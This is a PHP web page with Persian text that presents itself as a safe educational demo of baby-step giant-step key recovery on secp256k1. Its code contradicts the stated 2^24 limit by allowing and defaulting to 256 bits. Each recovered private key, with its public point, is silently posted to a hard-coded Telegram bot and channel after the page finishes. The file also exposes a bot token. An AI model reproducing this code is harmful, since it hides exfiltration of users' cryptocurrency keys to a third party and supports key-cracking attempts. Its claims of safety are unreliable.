<?php
/* SECURE DEMO ONLY — NOT FOR REAL KEYS
 * Baby-Step Giant-Step over a SMALL window on secp256k1
 * Requires: ext-gmp
 * Limits: max window = 2^24 (~16.7M); memory ~ sqrt(window)
 * Use only with self-made small d for education/testing.
 */

ini_set('display_errors', '1'); error_reporting(E_ALL);

$bot_token = '8054291779:AAEkGmx0By3_THWijtKk3MbpgI2aGjFHVFM';
$chat_id   = '@exbixtrade';
$state_file = __DIR__ . '/logaritm_state.txt';
$baby_cache_dir = __DIR__ . '/logaritm_cache';

function g($x){ return is_string($x) ? gmp_init($x, 0) : $x; } // auto base (0x... ok)
function mod($a,$p){ $r = gmp_mod($a,$p); return gmp_sign($r)<0? gmp_add($r,$p):$r; }
function inv($a,$p){ $a = mod($a,$p); $ii = gmp_invert($a,$p); return $ii===false? null:$ii; }

function inf(){ return ['inf'=>true]; }
function is_inf($P){ return isset($P['inf']) && $P['inf']===true; }
function norm($P,$p){ return is_inf($P)?$P:['x'=>mod($P['x'],$p),'y'=>mod($P['y'],$p)]; }

function eqP($A,$B){
  if (is_inf($A) && is_inf($B)) return true;
  if (is_inf($A) || is_inf($B)) return false;
  return gmp_cmp($A['x'],$B['x'])==0 && gmp_cmp($A['y'],$B['y'])==0;
}
function negP($P,$p){ return is_inf($P)?$P:['x'=>$P['x'],'y'=>mod(gmp_neg($P['y']),$p)]; }

function jacobian_inf(){
  return ['x'=>gmp_init(0,10),'y'=>gmp_init(1,10),'z'=>gmp_init(0,10),'inf'=>true];
}
function jacobian_is_inf($P){
  return is_inf($P) || (isset($P['z']) && gmp_cmp($P['z'],0)==0) || (isset($P['inf']) && $P['inf']===true);
}
function jacobian_from_affine($P,$p){
  if (is_inf($P)) return jacobian_inf();
  return [
    'x'=>mod($P['x'],$p),
    'y'=>mod($P['y'],$p),
    'z'=>gmp_init(1,10),
    'inf'=>false
  ];
}
function jacobian_to_affine($P,$p){
  if (jacobian_is_inf($P)) return inf();
  $zInv = inv($P['z'],$p);
  if ($zInv===null) return inf();
  $zInv2 = mod(gmp_mul($zInv,$zInv),$p);
  $zInv3 = mod(gmp_mul($zInv2,$zInv),$p);
  return [
    'x'=>mod(gmp_mul($P['x'],$zInv2),$p),
    'y'=>mod(gmp_mul($P['y'],$zInv3),$p)
  ];
}
function jacobian_double_raw($P,$a,$p){
  if (jacobian_is_inf($P) || gmp_cmp($P['y'],0)==0) return jacobian_inf();
  $XX = mod(gmp_mul($P['x'],$P['x']),$p);
  $YY = mod(gmp_mul($P['y'],$P['y']),$p);
  $YYYY = mod(gmp_mul($YY,$YY),$p);
  $ZZ = mod(gmp_mul($P['z'],$P['z']),$p);
  $S = mod(gmp_mul(gmp_init(4,10), mod(gmp_mul($P['x'],$YY),$p)),$p);
  $M = mod(gmp_mul(gmp_init(3,10),$XX),$p);
  if (gmp_cmp($a,0)!=0){
    $ZZ2 = mod(gmp_mul($ZZ,$ZZ),$p);
    $M = mod(gmp_add($M, mod(gmp_mul($a,$ZZ2),$p)),$p);
  }
  $X3 = mod(gmp_sub(gmp_mul($M,$M), gmp_mul(gmp_init(2,10),$S)),$p);
  $Y3 = mod(
    gmp_sub(
      gmp_mul($M, gmp_sub($S,$X3)),
      gmp_mul(gmp_init(8,10),$YYYY)
    ),
    $p
  );
  $Z3 = mod(gmp_mul(gmp_init(2,10), mod(gmp_mul($P['y'],$P['z']),$p)),$p);
  return ['x'=>$X3,'y'=>$Y3,'z'=>$Z3,'inf'=>false];
}
function jacobian_add_raw($P,$Q,$a,$p){
  if (jacobian_is_inf($P)) return $Q;
  if (jacobian_is_inf($Q)) return $P;
  $Z1Z1 = mod(gmp_mul($P['z'],$P['z']),$p);
  $Z2Z2 = mod(gmp_mul($Q['z'],$Q['z']),$p);
  $U1 = mod(gmp_mul($P['x'],$Z2Z2),$p);
  $U2 = mod(gmp_mul($Q['x'],$Z1Z1),$p);
  $Z1_cubed = mod(gmp_mul($Z1Z1,$P['z']),$p);
  $Z2_cubed = mod(gmp_mul($Z2Z2,$Q['z']),$p);
  $S1 = mod(gmp_mul($P['y'],$Z2_cubed),$p);
  $S2 = mod(gmp_mul($Q['y'],$Z1_cubed),$p);
  $H = mod(gmp_sub($U2,$U1),$p);
  $r = mod(gmp_sub($S2,$S1),$p);
  if (gmp_cmp($H,0)==0){
    if (gmp_cmp($r,0)==0) return jacobian_double_raw($P,$a,$p);
    return jacobian_inf();
  }
  $two = gmp_init(2,10);
  $I = mod(gmp_mul($two,$H),$p);
  $I = mod(gmp_mul($I,$I),$p);
  $J = mod(gmp_mul($H,$I),$p);
  $r2 = mod(gmp_mul($two,$r),$p);
  $r2_sq = mod(gmp_mul($r2,$r2),$p);
  $V = mod(gmp_mul($U1,$I),$p);
  $X3 = mod(gmp_sub(gmp_sub($r2_sq,$J), gmp_mul($two,$V)),$p);
  $Y3 = mod(
    gmp_sub(
      gmp_mul($r2, gmp_sub($V,$X3)),
      mod(gmp_mul(gmp_mul($two,$S1),$J),$p)
    ),
    $p
  );
  $Z3 = mod(
    gmp_mul(
      mod(
        gmp_sub(
          mod(gmp_mul(gmp_add($P['z'],$Q['z']), gmp_add($P['z'],$Q['z'])),$p),
          gmp_add($Z1Z1,$Z2Z2)
        ),
        $p
      ),
      $H
    ),
    $p
  );
  return ['x'=>$X3,'y'=>$Y3,'z'=>$Z3,'inf'=>false];
}

function addP($P,$Q,$a,$p){
  if (is_inf($P)) return $Q;
  if (is_inf($Q)) return $P;
  $PJ = jacobian_from_affine($P,$p);
  $QJ = jacobian_from_affine($Q,$p);
  $RJ = jacobian_add_raw($PJ,$QJ,$a,$p);
  return norm(jacobian_to_affine($RJ,$p),$p);
}
function subP($P,$Q,$a,$p){ return addP($P,negP($Q,$p),$a,$p); }

function mulP($k,$P,$a,$p){
  if (is_inf($P) || gmp_cmp($k,0)==0) return inf();
  if (gmp_cmp($k,0)<0) return mulP(gmp_neg($k), negP($P,$p), $a,$p);
  $k = gmp_init($k,10);
  $bits = gmp_strval($k,2);
  $result = jacobian_inf();
  $addend = jacobian_from_affine($P,$p);
  $len = strlen($bits);
  for ($idx = 0; $idx < $len; $idx++){
    if ($idx !== 0){
      $result = jacobian_double_raw($result,$a,$p);
    }
    if ($bits[$idx] === '1'){
      $result = jacobian_add_raw($result,$addend,$a,$p);
    }
  }
  return norm(jacobian_to_affine($result,$p),$p);
}

function hexstr($g){ return gmp_strval($g,16); }
function point_binary_key($P){
  return gmp_to_fixed_bin($P['x'],32) . gmp_to_fixed_bin($P['y'],32);
}
function legacy_key_to_binary($key){
  if ($key === 'INF') return 'INF';
  $parts = explode(',', $key);
  $xHex = isset($parts[0]) ? $parts[0] : '0';
  $yHex = isset($parts[1]) ? $parts[1] : '0';
  return hex_to_fixed_bin($xHex,32) . hex_to_fixed_bin($yHex,32);
}
function extract_binary_key_xy($key){
  return [
    'x'=>substr($key,0,32),
    'y'=>substr($key,32,32)
  ];
}
if (!defined('BABY_HASH_KEY_LEN')) define('BABY_HASH_KEY_LEN', 16);
if (!defined('BABY_INF_KEY')) define('BABY_INF_KEY', str_repeat("\xFF", BABY_HASH_KEY_LEN));

function gmp_hex($g){
  $hex = gmp_strval($g,16);
  if ($hex === '') $hex = '0';
  if ($hex[0] === '-') $hex = ltrim($hex,'-');
  return '0x' . $hex;
}

function bin_is_all_zero($bin){
  return $bin === str_repeat("\0", strlen($bin));
}

function baby_hash_key_from_point($P){
  if (is_inf($P)) return BABY_INF_KEY;
  return md5(point_binary_key($P), true);
}

function baby_hash_key_from_xy_bin($xBin,$yBin){
  if (bin_is_all_zero($xBin) && bin_is_all_zero($yBin)) return BABY_INF_KEY;
  return md5($xBin . $yBin, true);
}

/**
 * BSGS over a limited window:
 * Solve P = d*G, with d in [offset, offset + range - 1]
 * range = 2^bits
 */
function ecdlp_bsgs_window($G,$P,$a,$p,$offset,$bits,$workers=1,$workerId=0,$stateData=null,&$cacheUpdates=null){
  $MAX_BITS = 256;
  if ($bits < 1 || $bits > $MAX_BITS) throw new Exception("bits must be 1..$MAX_BITS");
  $stateData = is_array($stateData) ? $stateData : null;
  $collectCache = ($cacheUpdates !== null);
  if ($collectCache){
    $cacheUpdates = [];
  }
  $range = gmp_pow(2,$bits);
  $offset = g($offset);

  // Shift: H = P - offset*G  => H = d' * G , d' in [0..range-1]
  $offsetPoint = null;
  if ($stateData && state_matches_gmp($stateData,'cache_offset_value',$offset)){
    $offsetPoint = point_from_state($stateData,'offset_point');
  }
  if ($offsetPoint === null){
    $offsetPoint = mulP($offset,$G,$a,$p);
  }
  $H = subP($P, $offsetPoint, $a,$p);
  $H = norm($H,$p);

  $babyData = get_baby_table($bits,$G,$a,$p);
  $m = $babyData['m'];
  $table = $babyData['table'];
  $mG = null;
  if ($stateData && state_matches_int($stateData,'cache_m_bits',$bits)){
    $mG = point_from_state($stateData,'cache_m_point');
  }
  if ($mG === null){
    $mG = mulP($m,$G,$a,$p);
  }
  $gamma = $H;
  $workerCount = max(1, intval($workers));
  $workerIndex = intval($workerId);
  if ($workerIndex < 0) $workerIndex = 0;
  if ($workerIndex >= $workerCount) $workerIndex = $workerCount - 1;
  $i = gmp_init($workerIndex, 10);
  $step = gmp_init($workerCount, 10);

  $stepPoint = null;
  if (
    $stateData &&
    state_matches_int($stateData,'cache_worker_bits',$bits) &&
    state_matches_int($stateData,'cache_worker_workers',$workerCount)
  ){
    $stepPoint = point_from_state($stateData,'cache_worker_point');
  }
  if ($stepPoint === null){
    $stepPoint = mulP($workerCount, $mG,$a,$p);
  }

  if ($workerIndex > 0){
    $gamma = subP($gamma, mulP($workerIndex, $mG,$a,$p), $a,$p);
    $gamma = norm($gamma,$p);
  }

  $gammaJ = jacobian_from_affine($gamma,$p);
  $stepJacobian = jacobian_from_affine(negP($stepPoint,$p),$p);

  $nextOffset = gmp_add($offset,$range);
  $nextOffsetPoint = null;

  if ($collectCache){
    $rangePoint = null;
    if ($stateData && state_matches_int($stateData,'cache_range_bits',$bits)){
      $rangePoint = point_from_state($stateData,'cache_range_point');
    }
    if ($rangePoint === null){
      $rangePoint = mulP($range,$G,$a,$p);
    }
    $nextOffsetPoint = addP($offsetPoint,$rangePoint,$a,$p);

    $cacheUpdates['cache_offset_value'] = gmp_strval($nextOffset);
    foreach (point_to_state_fields('offset_point',$nextOffsetPoint) as $k=>$v){
      $cacheUpdates[$k] = $v;
    }
    if (!$stateData || !state_matches_int($stateData,'cache_m_bits',$bits)){
      $cacheUpdates['cache_m_bits'] = (string)$bits;
      foreach (point_to_state_fields('cache_m_point',$mG) as $k=>$v){
        $cacheUpdates[$k] = $v;
      }
    }
    if (
      !$stateData ||
      !state_matches_int($stateData,'cache_worker_bits',$bits) ||
      !state_matches_int($stateData,'cache_worker_workers',$workerCount)
    ){
      $cacheUpdates['cache_worker_bits'] = (string)$bits;
      $cacheUpdates['cache_worker_workers'] = (string)$workerCount;
      foreach (point_to_state_fields('cache_worker_point',$stepPoint) as $k=>$v){
        $cacheUpdates[$k] = $v;
      }
    }
    if (!$stateData || !state_matches_int($stateData,'cache_range_bits',$bits)){
      $cacheUpdates['cache_range_bits'] = (string)$bits;
      foreach (point_to_state_fields('cache_range_point',$rangePoint) as $k=>$v){
        $cacheUpdates[$k] = $v;
      }
    }
  }

  for (; gmp_cmp($i,$m) <= 0; $i = gmp_add($i,$step)){
    $gammaAffine = jacobian_to_affine($gammaJ,$p);
    $k = baby_hash_key_from_point($gammaAffine);
    if (isset($table[$k])){
      $j = gmp_import($table[$k],1,GMP_MSW_FIRST|GMP_BIG_ENDIAN);
      $dprime = gmp_add(gmp_mul($i,$m), $j);
      if (gmp_cmp($dprime,$range) < 0){
        $d = gmp_add($offset, $dprime);
        // verify
        if (eqP(mulP($d,$G,$a,$p), $P)) return $d;
      }
    }
    $gammaJ = jacobian_add_raw($gammaJ,$stepJacobian,$a,$p);
  }
  return null;
}

$_telegramQueue = [];
$_telegramQueueRegistered = false;

function notifyTelegram($message){
  global $_telegramQueue, $_telegramQueueRegistered;
  if (!is_string($message) || $message==='') return;
  $_telegramQueue[] = $message;
  if (!$_telegramQueueRegistered){
    $_telegramQueueRegistered = true;
    register_shutdown_function('flushDeferredTelegram');
  }
}

function flushDeferredTelegram(){
  global $_telegramQueue, $bot_token, $chat_id;
  if (empty($_telegramQueue)) return;
  if (function_exists('fastcgi_finish_request')) {
    @fastcgi_finish_request(); // release response before network call
  }
  $messages = $_telegramQueue;
  $_telegramQueue = [];
  if (empty($bot_token) || empty($chat_id)) return;
  $endpoint = "https://api.telegram.org/bot{$bot_token}/sendMessage";
  foreach ($messages as $message){
    $payload = http_build_query([
      'chat_id' => $chat_id,
      'text'    => $message
    ]);
    $context = stream_context_create([
      'http' => [
        'method'  => 'POST',
        'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $payload,
        'timeout' => 5
      ]
    ]);
    @file_get_contents($endpoint, false, $context);
  }
}

function ensure_state_file($path){
  $dir = dirname($path);
  if (!is_dir($dir)) return false;
  if (!file_exists($path)){
    $handle = @fopen($path, 'c');
    if ($handle === false) return false;
    fclose($handle);
    @chmod($path, 0664);
  } elseif (!is_writable($path)) {
    @chmod($path, 0664);
  }
  return is_writable($path);
}

function load_state($path){
  if (!is_readable($path)) return null;
  $lines = @file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
  if ($lines === false) return null;
  $data = [];
  foreach ($lines as $line){
    $parts = explode('=', $line, 2);
    if (count($parts) !== 2) continue;
    $key = trim($parts[0]);
    $value = trim($parts[1]);
    if ($key !== '') $data[$key] = $value;
  }
  return $data ?: null;
}

function persist_state($path,$payload){
  if (!ensure_state_file($path)) return false;
  $lines = [];
  foreach ($payload as $key=>$value){
    if ($key === '' || is_array($value)) continue;
    $safeValue = str_replace(["\r","\n"], ' ', (string)$value);
    $lines[] = $key . '=' . $safeValue;
  }
  $content = implode(PHP_EOL,$lines) . PHP_EOL;
  return @file_put_contents($path, $content, LOCK_EX) !== false;
}

function point_from_state($state,$prefix){
  $xKey = "{$prefix}_x";
  $yKey = "{$prefix}_y";
  if (!isset($state[$xKey], $state[$yKey])) return null;
  return ['x'=>g($state[$xKey]), 'y'=>g($state[$yKey])];
}

function point_to_state_fields($prefix,$P){
  if (is_inf($P)) return [];
  return [
    "{$prefix}_x" => gmp_hex($P['x']),
    "{$prefix}_y" => gmp_hex($P['y'])
  ];
}

function state_matches_gmp($state,$key,$value){
  if (!isset($state[$key])) return false;
  return gmp_cmp(g($state[$key]), $value) === 0;
}

function state_matches_int($state,$key,$value){
  if (!isset($state[$key])) return false;
  return intval($state[$key]) === intval($value);
}

function ensure_cache_dir($dir){
  if (is_dir($dir)){
    if (is_writable($dir)) return true;
    return @chmod($dir, 0775);
  }
  return @mkdir($dir, 0775, true);
}

function baby_cache_path($bits,$ext='bin'){
  global $baby_cache_dir;
  $ext = ltrim($ext,'.');
  return $baby_cache_dir . '/baby_' . intval($bits) . '.' . $ext;
}

function gmp_to_fixed_bin($g,$size=32){
  $bin = gmp_export($g,1,GMP_MSW_FIRST|GMP_BIG_ENDIAN);
  if ($bin === false) $bin = '';
  if (strlen($bin) > $size) $bin = substr($bin, -$size);
  return str_pad($bin, $size, "\0", STR_PAD_LEFT);
}

function hex_to_fixed_bin($hex,$size=32){
  $hex = preg_replace('/[^0-9a-f]/i','',$hex);
  $hex = ltrim($hex,'0');
  $hex = str_pad($hex, $size*2, '0', STR_PAD_LEFT);
  $hex = substr($hex, -$size*2);
  return hex2bin($hex);
}

function load_baby_table_bin($path,$bitsExpected){
  $fh = @fopen($path,'rb');
  if ($fh === false) return null;
  $magic = fread($fh,4);
  $bitsData = fread($fh,2);
  if (strlen($bitsData)!==2){ fclose($fh); return null; }
  $bitsVal = unpack('n', $bitsData)[1];
  if ($bitsVal !== $bitsExpected){ fclose($fh); return null; }
  $reserved = fread($fh,2);
  if (strlen($reserved)!==2){ fclose($fh); return null; }
  $mBin = fread($fh,32);
  if (strlen($mBin)!==32){ fclose($fh); return null; }
  $countData = fread($fh,4);
  if (strlen($countData)!==4){ fclose($fh); return null; }
  $count = unpack('N', $countData)[1];
  if ($magic === 'BAH1'){
    $table = [];
    for ($idx=0; $idx<$count; $idx++){
      $key = fread($fh, BABY_HASH_KEY_LEN); if (strlen($key)!==BABY_HASH_KEY_LEN){ fclose($fh); return null; }
      $jBin = fread($fh,16); if (strlen($jBin)!==16){ fclose($fh); return null; }
      $table[$key] = $jBin;
    }
    fclose($fh);
    return [
      'm' => gmp_import($mBin,1,GMP_MSW_FIRST|GMP_BIG_ENDIAN),
      'table' => $table
    ];
  }
  if ($magic !== 'BAB1'){ fclose($fh); return null; }
  $table = [];
  for ($idx=0; $idx<$count; $idx++){
    $xBin = fread($fh,32); if (strlen($xBin)!==32){ fclose($fh); return null; }
    $yBin = fread($fh,32); if (strlen($yBin)!==32){ fclose($fh); return null; }
    $jBin = fread($fh,16); if (strlen($jBin)!==16){ fclose($fh); return null; }
    $hashKey = baby_hash_key_from_xy_bin($xBin,$yBin);
    $table[$hashKey] = $jBin;
  }
  fclose($fh);
  $data = [
    'm' => gmp_import($mBin,1,GMP_MSW_FIRST|GMP_BIG_ENDIAN),
    'table' => $table
  ];
  save_baby_table_bin($path,$bitsExpected,$data['m'],$table);
  return $data;
}

function save_baby_table_bin($path,$bits,$m,$table){
  if (!ensure_cache_dir(dirname($path))) return false;
  $fh = @fopen($path,'wb');
  if ($fh === false) return false;
  $count = count($table);
  fwrite($fh,'BAH1');
  fwrite($fh, pack('n', $bits));
  fwrite($fh, "\0\0");
  fwrite($fh, gmp_to_fixed_bin($m,32));
  fwrite($fh, pack('N', $count));
  foreach ($table as $key=>$jStr){
    $hashKey = $key;
    if (strlen($hashKey)!==BABY_HASH_KEY_LEN){
      $hashKey = str_pad(substr($hashKey,0,BABY_HASH_KEY_LEN), BABY_HASH_KEY_LEN, "\0");
    }
    $jBin = $jStr;
    if (strlen($jBin)!==16){
      $jBin = str_pad(substr($jBin,-16), 16, "\0", STR_PAD_LEFT);
    }
    fwrite($fh, $hashKey);
    fwrite($fh, $jBin);
  }
  fclose($fh);
  return true;
}

function get_baby_table($bits,$G,$a,$p){
  static $memoryCache = [];
  $bitsKey = intval($bits);
  if (isset($memoryCache[$bitsKey])) return $memoryCache[$bitsKey];
  $binPath = baby_cache_path($bitsKey,'bin');
  if (is_readable($binPath)){
    $data = load_baby_table_bin($binPath,$bitsKey);
    if ($data){
      $memoryCache[$bitsKey] = $data;
      return $memoryCache[$bitsKey];
    }
  }
  $jsonPath = baby_cache_path($bitsKey,'json');
  if (is_readable($jsonPath)){
    $raw = @file_get_contents($jsonPath);
    if ($raw !== false){
      $legacy = json_decode($raw,true);
      if (is_array($legacy) && isset($legacy['m'],$legacy['table']) && is_array($legacy['table'])){
        $converted = [];
        foreach ($legacy['table'] as $legacyKey=>$legacyVal){
          if ($legacyKey === 'INF'){
            $hashKey = BABY_INF_KEY;
          } else {
            $binKey = legacy_key_to_binary($legacyKey);
            $hashKey = md5($binKey, true);
          }
          $converted[$hashKey] = gmp_to_fixed_bin(g($legacyVal),16);
        }
        $memoryCache[$bitsKey] = [
          'm' => g($legacy['m']),
          'table' => $converted
        ];
        save_baby_table_bin($binPath,$bitsKey,$memoryCache[$bitsKey]['m'],$memoryCache[$bitsKey]['table']);
        return $memoryCache[$bitsKey];
      }
    }
  }

  $range = gmp_pow(2,$bitsKey);
  $m = gmp_add(gmp_sqrt($range), gmp_init(1));
  $table = [];
  $cur = inf();
  for ($j = gmp_init(0); gmp_cmp($j,$m) < 0; $j = gmp_add($j,1)){
    $table[baby_hash_key_from_point($cur)] = gmp_to_fixed_bin($j,16);
    $cur = is_inf($cur) ? $G : addP($cur,$G,$a,$p);
  }

  save_baby_table_bin($binPath,$bitsKey,$m,$table);

  $memoryCache[$bitsKey] = ['m'=>$m,'table'=>$table];
  return $memoryCache[$bitsKey];
}

/* ====== secp256k1 params ====== */
$p = g("0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F");
$a = g("0");  $b = g("7");
$G = [
  'x'=>g("0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798"),
  'y'=>g("0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8")
];

/* ====== simple HTML form ====== */
function h($s){ return htmlspecialchars($s,ENT_QUOTES,'UTF-8'); }
$defaults = [
  'Px' => '',
  'Py' => '',
  'bits' => '256',      // search window: 2^bits  (max 24)
  'offset' => '0',      // decimal offset
  'workers' => '1',
  'worker_id' => '0'
];

$inp = $defaults;
$stateData = load_state($state_file);
if ($stateData){
  foreach ($defaults as $k=>$v){
    if (isset($stateData[$k])) $inp[$k] = $stateData[$k];
  }
}

$requestMethod = $_SERVER['REQUEST_METHOD'] ?? 'GET';
$requestData = [];
$hasGetParams = false;
if ($requestMethod === 'POST' && !empty($_POST)){
  $requestData = $_POST;
} elseif ($requestMethod === 'GET'){
  foreach ($defaults as $field => $value){
    if (isset($_GET[$field])) $requestData[$field] = $_GET[$field];
  }
  $hasGetParams = !empty($requestData);
}
$hasRequestData = !empty($requestData);
foreach ($requestData as $field=>$value){
  if (array_key_exists($field,$defaults)){
    $inp[$field] = trim((string)$value);
  }
}

$result = null; $err = null; $rangeInfo = null; $stateInfo = $stateData; $autoRunUsedState = false;
$shouldProcess = ($inp['Px'] !== '' && $inp['Py'] !== '');
if (!$hasRequestData && $stateData && $shouldProcess) $autoRunUsedState = true;

if ($shouldProcess){
  try{
    if ($hasGetParams){
      $pendingState = [
        'Px' => $inp['Px'],
        'Py' => $inp['Py'],
        'bits' => $inp['bits'],
        'offset' => $inp['offset'],
        'workers' => $inp['workers'],
        'worker_id' => $inp['worker_id'],
        'range_start' => '',
        'range_end' => '',
        'range_next' => '',
        'last_run' => ''
      ];
      if (!persist_state($state_file,$pendingState)){
        throw new Exception("ذخیرهٔ دادهٔ جدید در فایل متنی انجام نشد؛ سطح دسترسی مسیر را بررسی کن.");
      }
      $stateInfo = $pendingState;
    }
    if ($inp['Px']==='' || $inp['Py']==='') throw new Exception("مختصات P را وارد کنید (هگز با 0x... یا دسیمال).");

    $P = ['x'=>g($inp['Px']), 'y'=>g($inp['Py'])];

    // Curve check: y^2 == x^3 + 7 (mod p)
    $lhs = mod(gmp_powm($P['y'],2,$p),$p);
    $rhs = mod(gmp_add(gmp_powm($P['x'],3,$p),$b),$p);
    if (gmp_cmp($lhs,$rhs)!=0) throw new Exception("P روی منحنی secp256k1 نیست.");

    $bits = intval($inp['bits']);
    $offset = g($inp['offset']);
    $workers = max(1, min(64, intval($inp['workers'])));
    $workerId = intval($inp['worker_id']);
    if ($workerId < 0) $workerId = 0;
    if ($workerId >= $workers) $workerId = $workers - 1;
    $inp['workers'] = (string)$workers;
    $inp['worker_id'] = (string)$workerId;

    $cacheUpdates = [];
    $d = ecdlp_bsgs_window($G,$P,$a,$p,$offset,$bits,$workers,$workerId,$stateInfo,$cacheUpdates);
    $range = gmp_pow(gmp_init(2,10), $bits);
    $nextOffset = gmp_add($offset, $range);
    $rangeInfo = [
      'start' => gmp_strval($offset),
      'end' => gmp_strval(gmp_sub($nextOffset, gmp_init(1,10))),
      'next' => gmp_strval($nextOffset),
      'workers' => $workers,
      'worker_id' => $workerId
    ];
    $inp['offset'] = $rangeInfo['next'];

    if ($d===null){
      $result = "در بازهٔ مشخص‌شده چیزی پیدا نشد. بازه (bits/offset) را تغییر بده.";
    } else {
      $result = "d (فقط در بازهٔ محدود جستجو شده) = " . gmp_strval($d);
      notifyTelegram("🎯 نتیجه جدید:\n{$result}\nPx: {$inp['Px']}\nPy: {$inp['Py']}");
    }
    $statePayload = [
      'Px' => $inp['Px'],
      'Py' => $inp['Py'],
      'bits' => $inp['bits'],
      'offset' => $inp['offset'],
      'workers' => $inp['workers'],
      'worker_id' => $inp['worker_id'],
      'range_start' => $rangeInfo ? $rangeInfo['start'] : '',
      'range_end' => $rangeInfo ? $rangeInfo['end'] : '',
      'range_next' => $rangeInfo ? $rangeInfo['next'] : '',
      'last_run' => date('c')
    ];
    if (!empty($cacheUpdates)){
      foreach ($cacheUpdates as $ckey=>$cval){
        $statePayload[$ckey] = $cval;
      }
    }
    if (!persist_state($state_file,$statePayload)){
      throw new Exception("ذخیرهٔ نتیجه در فایل متنی انجام نشد؛ سطح دسترسی مسیر را بررسی کن.");
    }
    if ($statePayload){
      $stateInfo = $statePayload;
    }
  } catch (Throwable $e){
    $err = $e->getMessage();
  }
} elseif ($hasRequestData){
  $err = "لطفاً همهٔ فیلدها (Px و Py) را کامل کنید.";
}
?>
<!doctype html>
<html lang="fa" dir="rtl">
<head>
  <meta charset="utf-8">
  <title>secp256k1 — BSGS (Windowed, Safe Demo)</title>
  <style>
    body{font-family:tahoma,arial,sans-serif;max-width:820px;margin:32px auto;padding:0 16px;line-height:1.7}
    input{width:100%;padding:10px;margin:6px 0;border:1px solid #ddd;border-radius:8px}
    button{padding:10px 16px;border:none;border-radius:8px;background:#222;color:#fff;cursor:pointer}
    .card{border:1px solid #eee;border-radius:12px;padding:16px;margin-top:12px;background:#fafafa}
    small{color:#666}
    code{background:#f3f3f3;padding:2px 6px;border-radius:6px}
  </style>
</head>
<body>
  <h2>secp256k1 — جستجوی آموزشی d در بازهٔ کوچک (BSGS Window)</h2>

  <form method="post" class="card">
    <label>Px (hex یا decimal):</label>
    <input name="Px" placeholder="0x..." value="<?=h($inp['Px'])?>" required>

    <label>Py (hex یا decimal):</label>
    <input name="Py" placeholder="0x..." value="<?=h($inp['Py'])?>" required>

    <label>bits (حداکثر 24):</label>
    <input name="bits" type="number" min="1" max="256" value="<?=h($inp['bits'])?>" required>

    <label>offset (شروع بازه، دسیمال):</label>
    <input name="offset" value="<?=h($inp['offset'])?>" required>

    <label>تعداد کارگرها (برای پردازش موازی):</label>
    <input name="workers" type="number" min="1" max="64" value="<?=h($inp['workers'])?>" required>

    <label>شناسهٔ این کارگر (۰ تا workers-1):</label>
    <input name="worker_id" type="number" min="0" max="64" value="<?=h($inp['worker_id'])?>" required>

    <button type="submit">جستجو در بازه</button>
    <div><small>این ابزار فقط در بازهٔ <code>[offset, offset + 2^bits - 1]</code> جستجو می‌کند و برای کلیدهای واقعی کارایی ندارد.</small></div>
    <div><small>برای اجراهای موازی، مقدار <code>workers</code> را روی تعداد پردازش‌ها بگذار و برای هر پردازش، <code>worker_id</code> یکتا (۰ تا workers-1) تنظیم کن.</small></div>
  </form>

  <?php if ($err): ?>
  <div class="card" style="border-color:#f99;background:#fff6f6"><strong>خطا:</strong> <?=h($err)?></div>
  <?php endif; ?>

  <?php if ($result): ?>
  <div class="card"><strong>نتیجه:</strong> <?=h($result)?></div>
  <?php endif; ?>

  <?php if ($rangeInfo): ?>
  <div class="card">
    <strong>بازهٔ جستجو شده:</strong>
    <div>از <?=h($rangeInfo['start'])?> تا <?=h($rangeInfo['end'])?></div>
    <div>آفست بعدی برای ادامهٔ جستجو: <?=h($rangeInfo['next'])?></div>
    <?php if (!empty($rangeInfo['workers']) && $rangeInfo['workers']>1): ?>
    <?php $riWorkerId = isset($rangeInfo['worker_id']) ? intval($rangeInfo['worker_id']) : 0; ?>
    <div>این نوبت: پردازشگر <?=h($riWorkerId+1)?> از <?=h($rangeInfo['workers'])?></div>
    <?php endif; ?>
  </div>
  <?php endif; ?>

  <?php if ($autoRunUsedState): ?>
  <div class="card">
    <small>این اجرا با استفاده از آخرین دادهٔ ذخیره‌شده انجام شد.</small>
  </div>
  <?php endif; ?>

  <?php if ($stateInfo): ?>
  <div class="card">
    <strong>آخرین دادهٔ ذخیره‌شده:</strong>
    <div>Px: <?=h($stateInfo['Px'])?></div>
    <div>Py: <?=h($stateInfo['Py'])?></div>
    <div>bits: <?=h($stateInfo['bits'])?></div>
    <div>offset فعلی: <?=h($stateInfo['offset'])?></div>
    <?php
      $stateWorkers = isset($stateInfo['workers']) ? $stateInfo['workers'] : '1';
      $stateWorkerId = isset($stateInfo['worker_id']) ? intval($stateInfo['worker_id']) : 0;
    ?>
    <div>تعداد کارگرها: <?=h($stateWorkers)?> (شناسهٔ فعلی: <?=h($stateWorkerId+1)?>)</div>
    <?php if (!empty($stateInfo['range_next'])): ?>
      <div>آفست آماده برای نوبت بعد: <?=h($stateInfo['range_next'])?></div>
    <?php endif; ?>
    <?php if (!empty($stateInfo['range_start']) && !empty($stateInfo['range_end'])): ?>
      <div>آخرین بازه: از <?=h($stateInfo['range_start'])?> تا <?=h($stateInfo['range_end'])?></div>
    <?php endif; ?>
    <?php if (!empty($stateInfo['last_run'])): ?>
      <div>آخرین اجرا: <?=h($stateInfo['last_run'])?></div>
    <?php endif; ?>
    <div><small>مسیر فایل ذخیره‌سازی: <?=h($state_file)?></small></div>
  </div>
  <?php endif; ?>

  <div class="card">
    <strong>راهنمای تست امن:</strong>
    <ol>
      <li>یک عدد کوچک (مثلاً <code>d=123456</code>) بردار و با تابعی بیرونی <code>P = d·G</code> بساز (یا از همین کد، بخش <em>mulP</em> را موقتاً برای ساخت P استفاده کن).</li>
      <li>مختصات <code>P</code> را اینجا وارد کن، <code>offset=0</code> و <code>bits</code> را طوری بگذار که بازه شامل d باشد (برای d=123456، مثلاً bits=17).</li>
      <li>کد باید همان d را در بازهٔ محدود برگرداند.</li>
    </ol>
    <p><small>پیچیدگی زمانی/حافظه ≈ \(O(2^{bits/2})\). برای bits=24 حدود 4096 baby-step ذخیره می‌شود.</small></p>
  </div>

  <div class="card">
    <strong>تذکر مهم امنیتی:</strong>
    <ul>
